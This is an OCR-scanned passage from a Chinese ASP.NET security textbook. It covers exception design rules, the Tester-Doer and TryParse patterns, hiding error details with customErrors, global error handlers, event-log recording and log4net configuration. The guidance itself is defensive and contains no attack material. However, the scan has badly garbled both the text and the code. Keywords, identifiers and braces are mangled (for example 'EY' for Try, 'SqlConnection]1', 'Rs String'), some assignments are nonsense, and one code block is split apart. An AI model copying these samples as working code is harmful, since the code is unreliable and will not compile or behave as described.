throw new ArgumentNullException ("value"); 
} 


address = value; 
j: 


2) 不 允许 可 公开 调用 的 API 显 式 或 隐 式 引发 

不 允许 可 公开 调用 的 API 显 式 或 隐 式 引发 System.NullReferenceException、System.Access 
ViolationException、System.InvalidCastException 或 System.Index Out OfRangeException, 应 
该 进行 参数 检查 以 避免 引发 这 些 异常 。 

3) StackOverflowException 

不 要 显 式 引发 System.StackOverflowException， 此 异常 只 应 由 公共 语言 运行 库 (CLR) 
引发 。 
4) 不 要 捕捉 System.StackOverflowException 
以 编程 方式 处 理 堆栈 溢出 极为 困难 ， 应 允许 此 异常 终止 进程 并 使 用 调试 确定 问题 的 根 
不 要 捕捉 System_.StackOverflowException 。 
5) OutOfMemoryException 
不 要 显 式 引 发 System.OutOfMemoryException， 此 异常 只 应 由 CLR 基础 结构 引发 。 
6) ComException 和 SEHException 
不 要 显 式 引发 System .Runtime.InteropServices.COMException 或 System Runtime .Interop- 
Services.SEHException。 这 些 异 常 只 应 由 CLR 基础 结构 引发 。 
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7) ExecutionEngineException 
不 要 显 式 引 发 System.ExecutionEngineException。 


11.2.4 设计 自 定义 错误 异常 


除了 系统 提供 的 错误 处 理 机 制 外 , NET 框架 还 允许 研发 人 员 设 计 自 己 的 自 定义 异 常 处 
理 机 制 。 这 就 要 求 我 们 在 设计 代码 时 避免 使 用 深层 次 的 异常 结构 。 一 定 要 从 
System.Exception 或 其 他 常见 基本 异常 类 之 一 派生 异常 。 


全 注意 : 捕捉 和 引发 标准 异常 类 型 有 一 个 指南 , 它 指 出 不 应 从 ApplicationException 派生 自 
定义 异常 。 
异常 类 名 称 一 定 要 以 Exception 后 级 结尾 ， 另 外 应 该 使 异常 可 序列 化 ， 异 常 必须 可 序 
列 化 才能 跨越 应 用 程序 域 和 远程 处 理 边界 正确 工作 。 
一 定 要 在 所 有 异常 中 都 提供 常见 构造 函数 ， 确 保 参 数 的 名 称 和 类 型 与 下 面 的 代码 实例 
中 使 用 的 相同 : 
public class NewException : BaseException, ISerializable 
!! 
public NewException() 


{ 
// 编写 错误 处 理 代码 


public NewException(string message) 


// 编写 错误 处 理 代码 


public NewException(string message, Exception inner) 


// 编写 错误 处 理 代 码 
} 


// This constructor is needed for serialization. 
protected NewException (SerializationInfo info, StreamingContext context) 
{ 
// 编写 错误 处 理 代码 
} 
， 


11.2.5 ”错误 异常 的 性 能 


如 果 Web 系统 设计 中 有 错误 信息 处 理 模 块 , 频繁 引发 处 理 异常 可 能 会 对 性 能 造成 不 良 
的 影响 。 对 于 经 常 性 执行 失败 的 代码 ， 可 以 使 用 设计 模式 最 大 限度 地 减少 性 能 问题 。 本 节 
将 讲解 处 理 异常 代码 和 性 能 之 间 的 关系 ， 在 异常 会 严重 影响 性 能 时 应 使 用 Tester-Doer 
模式 。 

开发 人 员 不 应 该 担心 异常 可 能 会 对 性 能 造成 不 良 影响 而 使 用 错误 代码 ， 应 该 利用 设计 
减少 性 能 问题 。 对 于 可 能 在 常见 方案 中 引发 异常 的 成 员 ， 可 以 考虑 使 用 Tester-Doer 模式 避 
免 与 异常 相关 的 性 能 问题 。 

Tester-Doer 模式 将 可 能 引发 异常 的 调用 划分 为 两 部 分 : Tester 和 Doer。Tester 对 可 能 
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导致 Doer 引发 异常 的 状态 执行 测试 , 而 测试 恰好 插入 在 引发 异常 的 代码 之 前 ,从 而 防范 了 
异常 发 生 。 

下 面 的 代码 演示 了 此 模式 的 Doer 部 分 ， 该 部 分 包含 一 个 方法 ， 在 向 该 方法 传递 null 
(在 Visual Basic 中 为 Nothing) 值 时 该 方法 将 引发 异常 。 如 果 频 繁 地 调用 该 方法 ， 就 可 能 
对 性 能 造成 不 良 影响 。 

public class Doer 

: // 抛 出 空 对 象 异常 


public static void ProcessMessage (string message) 


{ 





if (message == null) 


throw new ArgumentNullException ("message"); 
上 
} 
接 下 来 的 代码 演示 了 此 模式 的 Tester 部 分 ， 该 部 分 利用 测试 避免 在 Doer 将 引发 异常 
时 调用 Doer(ProcessMessage)。 
public class Tester 
{ 
public static void TesterDoer (ICollection<string> messages) 
fF 
foreach (string message in messages) 
{ 
// 测试 功能 调用 
// 假如 出 现 错误 
if (message != null) 
{ 


Doer .ProcessMessage (message); 


1 


全 注意 : 当 在 测试 涉及 可 变 对 象 的 多 线程 应 用 程序 中 使 用 该 模式 时 ， 必 须 解 决 可 能 出 现 的 
状态 争 用 问题 。 线 程 可 以 在 测试 之 后 ， Doer 执行 之 前 更 改 可 变 对 象 的 状态 。 使 用 
线程 同步 技术 可 以 解决 这 些 问题 。 


对 于 可 能 在 常见 方案 中 引发 异常 的 成 员 ， 可 以 考虑 使 用 TryParse 模式 来 避免 与 异常 相 
关 的 性 能 问题 。 

若 要 实现 TryParse 模式 ， 需 要 为 常见 方案 中 引发 异常 的 操作 提供 两 种 不 同 的 方法 : 第 
一 种 方法 X， 执 行 该 操作 并 在 适当 时 引发 异常 第 二 种 方法 TryX 不 引发 异常 ， 而 是 返回 
一 个 Boolean 值 以 指示 成 功 还 是 失败 。 对 TryX 的 成 功 调用 所 返回 的 任何 数据 都 通过 使 用 
out (在 Visual Basic 中 为 ByRef) 参数 予以 返回 , Parse 和 TryParse 方法 就 是 此 模式 的 实例 。 

要 为 每 个 使 用 TryParse 模式 的 成 员 提 供 一 个 引发 异常 的 成 员 。 只 提供 TryX 方法 几乎 
在 任何 时 候 都 不 是 最 佳 设计 ， 因 为 使 用 该 方法 需要 了 解 out 参数 。 此 外 ， 对 于 大 多 数 常 见 
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方案 来 说 ， 异 常 对 性 能 的 影响 不 构成 问题 ， 因 此 应 在 大 多 数 常见 方案 中 提供 这 种 方法 。 











11.2.6 ”显示 安全 的 错误 信息 


对 于 无 法 避免 的 错误 提示 ， 要 尽量 保障 信息 在 可 控制 的 范围 内 ， 如 读者 常见 的 404 错 
误 页 。 那 么 在 应 用 程序 显示 错误 信息 时 ,不 应 泄露 有 助 于 恶意 用 户 攻 击 系统 的 信息 。 例如 ， 
如 果 应 用 程序 试图 登录 数据 库 时 没有 成 功 , 显示 的 错误 信息 不 应 该 包括 正在 使 用 的 用 户 名 。 

根据 安全 原则 ， 有 许多 方法 可 以 对 错误 信息 进行 控制 ， 如 下 所 述 : 


1. 将 应 用 程序 配置 为 不 向 远程 用 户 显示 详细 错误 信息 


除了 这 样 做 以 外 ， 也 可 以 选择 将 错误 重 定向 到 应 用 程序 页 。 在 错误 处 理 程序 中 ， 可 以 
用 测试 确定 用 户 是 否 为 本 地 用 户 并 作出 相应 的 响应 。 在 捕捉 所 有 未 处 理 异常 并 将 它们 发 送 
到 一 般 错 误 页 的 页 级 别 或 应 用 程序 级 别 上 ， 创 建 全 局 错误 处 理 程序 。 这 样 ， 即 使 没有 预料 
到 某 个 问题 ， 用 户 也 不 会 看 到 异常 页 。 

在 应 用 程序 的 web.config 文件 中 ， 对 customErrors 元 素 进行 以 下 更 改 : 

(1) ( 必 选 ) 将 mode 属性 设置 为 RemoteOnly (区 分 大 小 写 ) ， 将 应 用 程序 配置 为 仅 
向 本 地 用 户 ( 用 户 和 开发 人 员 )〉 显示 详细 的 错误 。 

(2) (可 选 ) 包括 指向 应 用 程序 错误 页 的 defaultRedirect 属性 。 

(3) (可 选 ) 包括 将 错误 重 定向 到 特定 页 的 <error> 元 素 。 例如 可 以 将 标准 404 错误 (未 
找到 页 ) 重 定向 到 预 设 的 应 用 程序 页 。 

以 下 实例 显示 了 web.config 文件 中 的 典型 customErrors 块 : 


<customErrors mode="RemoteOnly" defaultRedirect="AppErrors.aspx"> 
<error statusCode="404" redirect="NoSuchPage.aspx"/> 
<error statusCode="403" redirect="NoAccessAllowed.aspx"/> 
</customErrors> 


2. 在 可 能 产生 错误 的 任何 语句 前 后 使 用 try-catch-finally 块 








(可 选 ) 使 用 Context 对 象 的 UserHostAddress 属性 对 本 地 用 户 进行 测试 并 相应 地 修改 
错误 处 理 。127.0.0.1 等 效 于 localhost， 表 示 浏 览 器 与 Web 服务 器 位 于 同一 台 计 算 机 上 。 
下 面 实例 代码 显示 的 是 一 个 错误 处 理 块 。 如 果 发 生 错误 则 加 载 Session 状态 变量 ， 应 
用 程序 显示 读 取 Session 变量 并 显示 错误 的 页 。 如 果 用 户 是 本 地 的 ， 则 提供 不 同 的 错误 详 
细 信 息 ， 最 后 在 finally 块 中 释放 资源 。 
， Visual Basic 代码 
EY 
SqlConnection]1 .Open () 
SqlDataAdapter] .Fil]l (Me .DsPubs1) 


Catch ex As Exception 
If HttpContext .Current .Request .UserHostAddress = "127.0.0.1" Then 


Session("CurrentError") = ex.Message 
Else 
Session("CurrentError") = "Error processing page." 
End If 
Server.Transfer ("ApplicationError.aspx") 
Finally 


SqlConnection]1.Close() 


«ls 
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End Try 


// C# 代 码 

Er 

{ 
sqlConnection] .Open(); 
sqlDataAdapter]1 .Fill (dsCustomers1); 

} 

catch (Exception ex) 

{ 
if(HttpContext.Current .Request.UserHostAddress == "127.0.0.1") 
{ Session["CurrentError"] = ex.Message; } 
else 
{ Session["CurrentError"] = "Error processing page."; } 
Server.Transfer ("ApplicationError.aspx"); 

} 

finally 

人 
this.sqlConnection]l.Close(); 


’ 


可 以 创建 另 一 种 错误 处 理 程序 ， 在 页 级 别 上 或 整个 应 用 程序 中 捕捉 所 有 未 处 理 的 
异常 。 


3. 创建 全 局 错误 处 理 程序 


要 创建 页 中 的 全 局 错误 处 理 程序 ， 就 需要 创建 Page_Error 事件 的 处 理 程序 。 创 建 应 用 
程序 范围 的 错误 处 理 程 序 需要 在 Global.asax 文件 的 Application_Error 方法 中 添加 代码 。 只 
要 该 页 面 或 应 用 程序 中 发 生 未 处 理 的 异常 ， 就 会 调用 这 些 方法 ， 就 可 以 从 
HttpServerUtility.GetLastError 方法 中 获取 有 关 最 新 错误 的 信息 。 


全 注意 : 面 中 全 局 错误 处 理 程序 ， 则 优先 于 在 web.config customErrors 元 素 的 
mets 属性 中 指定 的 错误 处 理 程序 。 


下 面 显 示 的 是 一 个 实例 处 理 程序 ， 它 获取 当前 错误 的 信息 ， 将 其 放 在 Session 变量 中 ， 
并 调用 可 以 提取 和 显示 信息 的 一 般 错误 处 理 页 。 


， Visual Basic 代码 
Sub Application Error (ByYVal sender Rs Object, ByVal e As EventRrgs) 


Session("CurrentError") = "Global: " & Server.GetLastError.Message 
Server.Transfer ("lasterr.aspx") 

End Sub 

// C# 代 码 


protected void Application Error(Object sender, EventArgs e) 


Session["CurrentError"] = "Global: "+ 
Server.GetLastError () .Message; 
Server.Transfer ("lasterr.aspx"); 


11.3 监控 自己 系统 的 安全 状态 


目前 ， 很 多 的 Web 系统 都 没有 设计 日 志 模块 ， 日 志 对 Web 系统 来 说 是 非常 必要 的 ， 
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系统 管理 员 能 够 通过 日 志 了 解 软 件 的 安全 运行 状态 和 用 户 操作 记录 。 这 些 数据 对 于 防止 黑 
客 攻击 ， 记 录 攻 击 前 的 蛛丝马迹 有 着 巨大 帮助 。 
接 下 来 讲述 查看 日 志 ， 开 发 自 定义 安全 日 志 系统 以 及 使 用 全 球 最 强 日 志 组 件 Log4net。 








11.3.1 Web 系统 安全 监控 


ASP.NET 运行 状况 监视 提供 了 一 种 轻松 的 方式 监视 ASP.NET 应 用 程序 的 运行 状况 ， 
并 为 管理 员 提供 有 关 ASPNET 资源 的 详细 运行 时 信息 。ASP.NET 运行 状况 监视 功能 可 用 
于 执行 下 列 任务 : 

口 监视 单个 活动 的 ASPNET 应 用 程序 ， 或 监视 网 络 中 活动 的 ASPNET 应 用 程序 。 

口 监视 ASPNET 应 用 程序 的 性 能 以 确保 它 正 常 运行 。 

口 诊断 有 发 生 故障 征兆 的 ASP.NET 应 用 程序 。 

口 记录 感 兴趣 的 事件 ， 这 些 事件 并 不 一 定 与 ASPNET 应 用 程序 中 的 错误 有 关 。 
虽然 这 些 作 法 可 以 提高 应 用 程序 的 安全 性 ， 但 同时 还 需要 不 断 地 更 新 应 用 程序 服务 
器 ,安装 最 新 的 Microsoft Windows 和 Internet 信息 服务 的 安全 修补 程序 以 及 Microsoft SQL 
Server 或 其 他 数据 库 的 修补 程序 ， 这 一 点 也 很 重要 。 

对 于 保护 运行 状况 监视 的 配置 ， 在 默认 情况 下 为 ASP.NET 应 用 程序 启用 运行 状况 监 
视 功 能 ， 开 发 人 员 可 以 通过 将 healthMonitoring 元 素 的 enabled 属性 设置 为 false 来 禁用 该 
功能 。 

实现 自 定义 事件 使 用 者 或 自 定义 事件 提供 程序 时 ， 需 要 检查 事件 内 容 ， 以 免 出 现 跨 站 
点 脚本 问题 。 

对 于 管理 员 非 常 重视 的 Web 事件 ， 可 以 限制 其 提供 程序 、 筛 选 器 和 母 版 页 。 

具有 受 保护 内 容 的 事件 要 求 使 用 继承 链接 ， 这 一 点 可 确保 只 能 派生 完全 受信 任 的 自 定 
义 事件 。 

公开 受 保护 事件 属性 中 敏感 数据 的 受信 任 事件 ， 就 必须 实施 代码 访问 安全 性 ， 以 避免 
诱饵 式 攻 击 。 用 于 查看 Web 事件 的 Windows 事件 管理 工具 (Windows Management 
Instrumentation，WMI) 类 型 被 锁定 ， 以 防止 所 有 用 户 访问 事件 数据 。 

Web 事件 可 以 由 可 生成 异常 或 事件 的 HTTP 请 求 或 应 用 程序 代码 触发 。 大 量 事件 可 能 
会 超过 事件 提供 程序 的 容量 ， 也 可 能 会 占 满 ASPNET 应 用 程序 或 服务 器 ， 这 将 影响 内 存 
使 用 、 磁盘 空间 ， 并 导致 网 络 通信 和 量 增 加 。 为 了 减 小 应 用 程序 受到 拒绝 服务 攻击 的 可 能 性 ， 
ASP.NET 使 用 以 下 默认 设计 : 

口 ASPNET 每 分 钟 抛 出 一 个 事件 实例 。 该 频率 在 profiles 元 素 中 进行 配置 ， 并且 与 

rules 元 素 中 的 事件 和 提供 程序 关联 。 

口 每 种 提供 程序 类 型 的 事件 缓冲 被 相互 隔离 ， 以 避免 占用 缓冲 区 空间 。 缓 冲 区 设置 

在 bufferModes 元 素 中 进行 配置 ， 可 以 通过 指定 提供 程序 所 需 设置 的 bufferModes 
元 素 将 提供 程序 配置 为 使 用 一 组 特定 的 缓冲 区 设置 。 

若 要 引发 自 定 义 事件 ， 需 要 中 等 或 更 高 的 信任 级 别 。 系 统管 理 员 可 以 使 用 上 面相 同 的 
方法 来 适当 地 配置 缓冲 设置 以 避免 溢出 , 特别 是 对 于 可 以 由 HTTP 请 求 触发 的 事件 。 此 外 ， 
可 以 设置 单独 的 缓冲 区 模式 ， 对 重要 事件 和 不 重要 的 事件 分 别 进行 处 理 。 

若 要 防止 向 不 必要 的 客户 端 公开 敏感 信息 ， 可 对 应 用 程序 进行 配置 ， 做 到 仅 当 客户 端 
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是 Web 服务 器 本 身 时 才 显 示 详 细 错 误 消 息 。 

默认 情况 下 ，ASP.NET 将 请 求 的 异常 Web 事件 记录 到 性 能 监视 系统 中 。 在 默认 配置 
中 ,这 意味 着 失败 的 登录 尝试 将 在 “应 用 程序 ”事件 日 志 中 记录 用 户 名 和 其 他 的 诊断 信息 ， 
通常 可 以 在 事件 查看 器 中 查看 这 些 数据 。 如 果 服 务 器 运行 的 是 Microsoft Windows Server 
2003/2008， 则 可 以 通过 保护 事件 日 志 以 及 设置 有 关 参 数 〈 如 日 志 的 大 小 、 保 留 时 间 和 其 他 
特性 参数 ， 以 防止 间接 的 服务 攻击 ) ， 提 高 应 用 程序 的 安全 性 。 





11.3.2 ”记录 错误 信息 


Web 应 用 系统 研发 对 过 程 中 不 能 保证 网 站 不 出 现 一 点 错误 ， 常 见 的 “页 面 不 存在 ”、 
“页 面 运行 出 错 ” 等 错误 信息 在 一 般 网 站 多 少 总 是 存在 的 。 关 键 是 ， 在 这 些 错 误 出 现 以 后 ， 
管理 员 怎 样 方便 并 且 及 时 地 发 现 它 们 、 尽 量 减少 用 户 对 网 站 的 不 良 印象 。 

不 管 是 IS 4 还 是 IIS 5， 都 可 以 通过 设置 网 站 的 “ 自 定 义 错误 信息 ”更 换 网 站 的 错误 
页 面 替换 为 管理 员 自 定义 的 页 面 ， 这 对 于 网 络 系统 的 实用 和 友好 性 都 大 有 帮助 。 

但 是 ， 在 真正 的 使 用 过 程 中 却 发 现 这 样 的 问题 ， 当 查看 网 站 日 志 的 时 候 出 现 了 这 些 错 
误 页 面 ， 但 是 却 不 能 在 系统 事件 中 查看 这 些 错 误 信 息 。 但 是 ， 在 网 站 的 日 志 中 查看 这 些 错 
误 信 息 又 比较 麻烦 ，JSP/PHP/ASP.NET 等 主流 技术 都 可 以 直接 将 产生 的 错误 信息 像 安 全 日 
志 一 样 保存 在 系统 日 志 中 ， 具 体 实现 步骤 如 下 : 


1. 建立 EventLog 虚 拟 目 录 


在 网 络 系统 中 建立 虚拟 目录 具体 方法 如 下 : 

在 Win2008 中 ， 打 开 “ 开 始 ” 一 “程序 ”一 “管理 工具 ”一 “Internet 信息 服务 ” 命 
令 , 找到 建立 的 网 站 , 右 击 在 弹出 的 快捷 菜单 中 选择 “新 建 ”命令 , 在 弹出 的 菜单 选择 “ 虚 
拟 目 录 ”， 然 后 按照 向 导 设置 即 可 。 


2. 修改 web.config 文 件 


在 web.config 文件 中 可 以 设置 错误 信息 页 面 的 位 置 和 错误 信息 是 否 显示 等 。 为 了 实现 
我 们 提 到 的 功能 ， 需 要 适当 地 修改 web.config 文件 ， 设 置 customErrors mode 为 ON， 目的 
是 非 本 地 计算 机 用 户 只 能 得 到 友好 〈 自 定义 ) 的 错误 信息 ， 具 体 设置 如 下 : 

<configuration> 

<system.web> 

<customErrors mode="On" defaultRedirect="/eventlog/customerrorpage.aspx"> 

<error statusCode="404" redirect="/eventlog/404Page.aspx"/> 

<error statusCode="403" redirect="/eventlog/403page.aspx"/> 

</customErrors> 

</system.web> 

</configuration> 

在 上 述 代码 中 ， 当 404 和 403 错误 产生 的 时 候 ， 页 面 回转 到 刚才 我 们 设置 EventLog 
虚拟 目录 的 相应 页 面 。 


3. 建立 其 他 文件 
为 了 测试 上 述 设置 是 否 成 功 ,必须 设立 一 个 可 以 产生 错误 的 页 面 Default.aspx， 这 个 页 
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面 的 代码 如 下 : 


<%$ @Language="VB" $> 

<script language="VB" runat=server> 
Sub Page Load(Sender As Object, E As EventArgs) 
If IsPostBack Then 

"定义 变量 

dim x as integer 

dim y as integer 

dim z as integer 

和 = 工 

y=0 

"产生 错误 

z= X/Y 

End Sub 

</script> 


<html> 

<head> 

</head> 

<body> 

<form method="post" action="eventlog.aspx" name="forml" id="number"> 
<asp:Button id="abutton" type="submit" text=" 点 击 产生 错误 " runat="server" /> 
</form> 

</body> 

</html> 


以 上 代码 设计 了 一 个 除 以 零 的 页 面 ， 按 钮 提交 时 页 面 肯定 出 错 ， 需 要 查看 是 否 错 误 加 
入 了 系统 日 志 。 下 面 是 错误 页 面 的 代码 ， 需 要 用 到 3 个 错误 页 面 : customerrorpage.aspx、 
404Page.aspx 和 403Page.aspx， 这 些 页 面 都 创建 在 虚拟 目录 EventLog 下 ， 代 码 如 下 : 


Customerrorpage.aspx 代码 
<html> 

<head></head> 

<body> 

<hl>custom error page</h1> 
</body> 

</html> 

404page .aspx〔 页 面 没 找到 错误 ) 代码 
<html> 

<head></head> 

<body> 

<h1>404 error page</h1> 
</body> 

</html> 


403page .aspx〔 权 限 错误 ) 代码 
<html> 

<head></head> 

<body> 

<h1>403 error page</h1> 
</body> 

</html> 


设置 以 上 页 面 后 ， 最 重要 的 是 设置 全 局 配置 文件 global.asax， 这 样 错误 信息 才 可 以 保 
存 到 系统 日 志 中 ， 设 置 代码 如 下 : 


<%@ Import Namespace="System" 和 > 
<%@ Import Namespace="System.Diagnostics" %> 


a 
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<script language="VB" runat=server> 


Public Sub Application OnError (Sender as Object, E as EventRrgs) 


"捕捉 错误 


dim LastError as Exception = Server.GetLastError() 
Dim ErrMessage as String = LastError.toString() 


"这 里 设置 日 志 的 名 字 为 MyLog 


Dim LogName Rs String = "MyLog" 
Dim Message Rs String = "Ur1 " & Request.Path & " Error: " & ErrMessage 


”如 果 日 志 不 存在 ,建立 一 个 


If (Not EventLog.SourceExists (LogName) ) Then 
EventLog.CreateEventSource (LogName, LogName) 


End if 


Dim Log as New EventLog 
Log.Source = LogName 


' 以 下 列 出 了 5 种 错误 


Log.WriteEntry (Message, EventLogEntryType.Information, 1) 


' Log.WriteEntry (Message, 
' Log.WriteEntry (Message, 
' Log.WriteEntry (Message, 
' Log.WriteEntry (Message, 
End Sub 

</script> 


在 以 上 设置 中 ， 定 义 了 当 错 误 


EventLogEntryType.Error, 2) 
EventLogEntryType.Warning, 3) 
EventLogEntryType.SuccessAudit, 4) 
EventLogEntryType.FailureAudit, 5) 


发 生 时 ，Web 服务 器 首先 检查 是 否 存 在 名 为 MyLog 的 


日 志 ， 如 果 不 存在 就 新 建 一 个 ， 然 后 将 错误 信息 写 入 日 志 并 保存 。 


在 以 上 设置 中 ， 注 意 以 下 几 点 : 


口 以 上 代码 中 将 日 志 命名 为 MyLog， 在 实际 应 用 中 ， 代 码 可 以 根据 自己 的 要 求 设置 
日 志 名 字 ， 如 “XX 的 网 站 日 志 ” 等 ， 这 样 不 但 容易 辨别 ， 而 且 也 不 会 被 其 他 管 


理 员 误 认 为 其 他 内 容 。 


口 以 上 给 出 的 错误 页 面具 有 一 个 简单 语句 ， 在 实际 的 网 站 应 用 中 ， 可 以 有 几 种 选择 ， 
可 以 将 所 有 错误 页 面 设置 为 网 站 的 首页 ， 当 页 面 出 错 或 者 页 面 不 存在 的 时 候 ， 直 


接 将 用 户 引 导 到 网 站 首页 ， 


这 样 不 显示 错误 信息 ， 对 用 户 而 言 浏览 感觉 比较 好 ; 


同时 也 可 以 将 错误 页 面 设 置 得 比较 友好 ， 最 好 不 用 简单 的 英文 提示 ， 而 是 一 般 用 


户 都 可 以 理解 的 方式 。 
4. 查看 效果 


打开 “事件 查看 ”就 可 以 验证 是 否 将 事件 写 入 日 志 。 打 开 “ 开 始 ” 一 “程序 ”一 “ 管 
理工 具 ” 一 “事件 查看 器 ”命令 ， 选 择 MyLog 项 。 

以 上 通过 完整 的 实例 详细 介绍 了 错误 信息 写 入 系统 日 志 的 方法 ， 这 对 于 系统 管理 和 网 
站 管理 都 可 以 起 到 很 好 的 帮助 作用 。 对 于 习惯 ASP 或 PHP 等 语言 编程 的 用 户 ， 在 使 用 
ASP.NET 以 后 , 不 能 仅仅 关注 页 面 实现 和 数据 处 理 等 常规 操作 , 而 应 该 进一步 在 网 站 安全 、 
系统 管理 等 方面 学 习 ， 真 正在 网 络 开发 方面 达到 一 个 更 高 的 境界 。 
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11.3.3 “日 志 组 件 


本 小 节 将 介绍 如 何在 项 目 中 使 用 Log4net, 以 及 如 果 通 过 Log4net 构建 严密 的 日 志 记录 
功能 。Log4net 是 目前 全 球 最 流行 的 日 志 组 件 ， 并 且 是 开源 的 。 


1. Log4net 简 介 


Log4net 是 基于 .NET 开发 的 一 款 记 录 日 志 的 开源 组 件 ,最 早 在 2001 年 7 月 由 NeoWorks 
Limited 启动 的 项 目 ， 基 本 的 框架 源 于 其 另外 的 一 个 著名 的 姐妹 组 件 一 log4j。Log4net 记录 
日 志 的 功能 非常 强大 ， 它 可 以 将 日 志 分 不 同 的 等 级 和 不 同 的 样式 ， 将 日 志 输 出 到 不 同 的 
媒介 。 


2. Log4net 核 心 组 成 


Log4net 主要 由 5 个 部 分 组 成 ， 分 别 为 Logger、Appenders、Filters、Layouts 和 Object 
Renders， 下 面 分 别 进行 介绍 : 

1) Logger 

(1) 日 志 分 类 。 

Log4net 能 够 以 多 种 方式 输出 日 志 。 支 持 日 志 输 出 常用 的 主要 媒介 有 数据 库 〈 包 括 MS 
SQL Server, Access, Oracle9i,Oracle8i,DB2,SQLite)、 控 制 台 、 文 件 、 事 件 日 志 ( 可 以 用 事 
件 查看 器 查看 ) 和 邮件 等 多 种 方式 。 

(2) 日 志 级 别 。 

Log4net 支持 多 种 级 别 的 日 志 ， 优 先 级 从 高 到 低 排列 如 下 : 

FATAL > ERROR > WARN > INFO > DEBUG 

此 外 还 有 ALL (允许 所 有 的 日 志 请 求 ) 和 OFF (拒绝 所 有 的 日 志 请 求 ) 这 两 种 特殊 的 
级 别 。 

2) Appenders 

Appenders 决定 日 志 输 出 的 方式 ， 实 现 log4net.Appenders.IAppender 接口 。 

Log4net 目前 支持 的 输出 方式 如 下 : 

(1) AdoNetAppender。 

将 日 志 记 录 到 数据 库 中 ， 可 以 采用 SQL 和 存储 过 程 两 种 方式 。 

(2) AnsiColorTerminalAppender。 

在 ANSI 窗口 终端 写 下 高 亮度 的 日 志 事件 。 

(3) AspNetIraceAppender。 

能 用 ASP.NET 中 trace 方式 查看 记录 的 日 志 。 

(4) BufferingForwardingAppender。 

在 输出 到 子 Appenders 之 前 先 缓存 日 志 事件 。 

(5) ConsoleAppender。 

将 日 志 输 出 到 控制 台 。 

(6) EventLogAppender。 

将 日 志 写 到 Windows Event Log。 
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(7) FileAppender。 
将 日 志 写 到 文件 中 。 


(8) LocalSyslogAppender。 

将 日 志 写 到 local syslog service( 仅 用 于 UNIX 环境 下 ) 。 

(9) MemoryAppender。 

将 日 志 存 到 内 存 缓冲 区 。 

(10) NetSendAppender。 

将 日 志 输 出 到 Windows Messenger service， 这 些 日 志 信 息 将 在 用 户 终端 的 对 话 框 中 





孝 
NN 


(11) RemoteSyslogAppender。 

通过 UDP 网 络 协议 将 日 志 写 到 Remote syslog service。 
(12) RemotingAppender。 

通过 .NET Remoting 将 日 志 写 到 远程 接收 端 

(13) RollingsFileAppender。 


将 日 志 以 回 滚 文件 





的 形式 写 到 文件 中 。 


(14) SmtpAppender。 

将 日 志 写 到 邮件 中 。 

(15) TraceAppender。 

将 日 志 写 到 .NET trace 系统 。 

(16) UdpAppender。 

将 日 志 以 connectionless UDP datagrams 的 形式 送 到 远程 宿主 或 以 UdpClient 的 形式 


广播 。 
3) Filters 


Appender 对 象 将 日 志 以 默认 的 方式 传 到 输出 流 ， 然 后 Filter 按照 不 同 的 标准 控制 日 志 
的 输出 。Filter et 的 各 种 参数 ， 最 简单 的 形式 是 在 appender 中 写 明 一 个 


Threshold。 这 样 ， 只 有 
log4net.Filters.IFilter ip 
4) Layouts 


级 别 大 于 或 等 于 Threshold 的 日 志 才 被 记录 。Filters 必须 实现 
盏 办 





Layouts 控制 日 志 的 显示 样式 ， 格 式 如 下 : 


"Stimestamp [gsthread] $-S5level Slogger - smessagesnewline" 


Timestamp: 表示 程序 已 经 开始 执行 的 时 间 ， 单 位 为 毫秒 。 

Thread: 执行 当前 代码 的 线程 。 

Level: 日 志 的 级 别 。 

Logger: 日 志 相 关 请 求 的 名 称 。 

Message: 日 志 消息 。 

Layouts 还 可 以 控制 日 志 的 输出 样式 ， 如 以 普通 形式 或 以 xml 等 形式 输出 。 

5) Object Renderers 

Object Renderers 是 很 重要 的 一 项 ,log4net 将 按照 用 户 定义 的 标准 输出 日 志 消息 .Object 
Renderers 实现 log4net.ObjectRenderer.IObjectRenerer 接口 。 
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3. log4net 的 使 用 


下 面 是 基于 控制 台 的 演示 程序 ， 描 述 了 log4net 输出 日 志 的 方法 。 本 例 中 日 志 将 会 记 
录 在 文件 、 控 制 台 事件 日 志和 Access 数据 库 中 。 
app.config 的 主要 代码 如 下 : 
配置 文件 app.config 


<?xml version="1.0" encoding="utf-8" ?> 
<configuration> 
<!-- Register a section handler for the log4net section --> 
<configSections> 
<section name="log4net" type="System.Configuration.IgnoreSection- 
Handler" /> 
</configSections> 
<appSettings> 
<!-- To enable internal log4net logging specify the following app 
Settings key --> 
<!-- <add key="log4net. Internal .Debug" value="true"/> --></appSettings> 
<!-- This section contains the log4net configuration settings --> 
<log4net> 
<! 一 -定义 输出 到 文件 中 --> 
<appender name="LogFileAppender" type="log4net.Appender.FileAppender"> 
<! 一 -定义 文件 存放 位 置 --> 
<file value="D:\log-filel.txt" /> 
<!-- Example using environment variables in params --> 





<! <file value="${TMP}\log-file.txt" /> --> 
<!--<sppendToFile value="true" />--> 

<!-- An alternate output encoding can be specified --> 
<!-- <encoding value="unicodeFFFE" /> --> 


<layout type="log4net.Layout.PatternLayout"> 
<!-- 每 条 日 志 末 尾 的 文字 说 明 --> 
<footer value=" [Footer]--Test By Ring1981 " /> 
<!-- 输 出 格式 --> 
<conversionPattern value="%date [sthread] %$-5level %logger [sndc] 
&lt;Sproperty{auth}&gt; - Smessagesnewline" /> 
</layout> 
</appender> 
<! 一 -定义 输出 到 控制 台 命 令 行 中 --> 
<appender name="ConsoleAppender" type="log4net .Appender.ConsoleAp-— 
pender"> 
<layout type="log4net.Layout.PatternLayout"> 
<conversionPattern value="%date [gsthread] %$-5level %logger 
[Sproperty{NDC}] - Smessagesnewline" /> 
</layout> 
</appender> 
<!-- 定 义 输出 到 windows 事件 中 --> 
<appender name="EventLogAppender" type="1log4net .Appender .EventLog- 
Appender"> 
<layout type="log4net.Layout.PatternLayout"> 
<conversionPattern Value="sdqdate [Sthread] $-5level $logger [sproperty{NDC]] 
—- Smessagesnewline" /> 
</layout> 
</appender> 
<! 一 -定义 输出 到 数据 库 中 , 这 里 举例 输出 到 Access 数据库 中 , 数据 库 为 D 盘 的 access - 
mdb-——> 
<appender name="AdoNetAppender Access" type="log4net .Appender.Ado-— 
NetAppender"> 
<connectionString value="Provider=Microsoft.Jet .OLEDB.4.0;Data 
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Source=C:\access.mdb" /> 
<commandText value="INSERT INTO Log ([Date], [Thread], [Level], [Logger], 
[Message]) 
VALUES (elog date, @thread, @log level, Q@logger, @message)" /> 
<! = 定义 各 个 参数 > 
<parameter> 
<parameterName value="@log date" /> 
<dbType value="String" /> 
<size value="255" /> 
<layout type="log4net.Layout.PatternLayout"> 
<conversionPattern value="%date" /> 
